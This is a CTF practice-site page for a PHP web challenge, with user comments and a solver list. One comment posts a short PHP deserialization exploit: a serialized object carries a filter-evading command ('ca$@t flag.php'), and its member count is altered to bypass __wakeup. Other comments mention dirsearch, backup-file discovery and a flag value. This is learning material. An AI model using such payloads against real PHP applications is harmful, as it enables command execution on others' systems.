安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1899
提  示:
描  述:
flag{}
评论
yuanyipaceandlove 1年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 2年前

特别要注意下url编码的问题

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

追风亚索 2年前

flag{Unser1alize_and_2CE_Add},flag是不是没变

回复 0

笨笨笨蛋 2年前

只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~

回复 2

YLMB001 2年前

为什么我序列化后的protected属性是带有%20*%20而不是%00*%00

回复 0

lysandria 2年前

注意protect属性。

回复 0

xiaoxiao972521 2年前

认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430

回复 0
SiiiirR0 2年前

万能的dirsearch

回复 0

落日星辰 2年前

分享:https://blog.csdn.net/zzldm/article/details/112004122

回复 1

sunny 2年前

学到了学到了

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

YameMres 攻破了该题 5小时前
zttyzz 攻破了该题 3天前
zwhnsh 攻破了该题 4天前
20220406402021 攻破了该题 5天前
fujialong 攻破了该题 5天前
17666664717 攻破了该题 5天前
sudden 攻破了该题 5天前
mmmiao 攻破了该题 6天前
19868806758 攻破了该题 6天前
18185185996 攻破了该题 9天前
lihaojie123 攻破了该题 9天前
x1997 攻破了该题 10天前
17330361658 攻破了该题 10天前
积极又努力的小冀同学 攻破了该题 10天前
675838709 攻破了该题 10天前
ifnoif 攻破了该题 11天前
fyhfyh 攻破了该题 11天前
folinic 攻破了该题 11天前
654272406 攻破了该题 11天前
2175424922 攻破了该题 11天前
问题反馈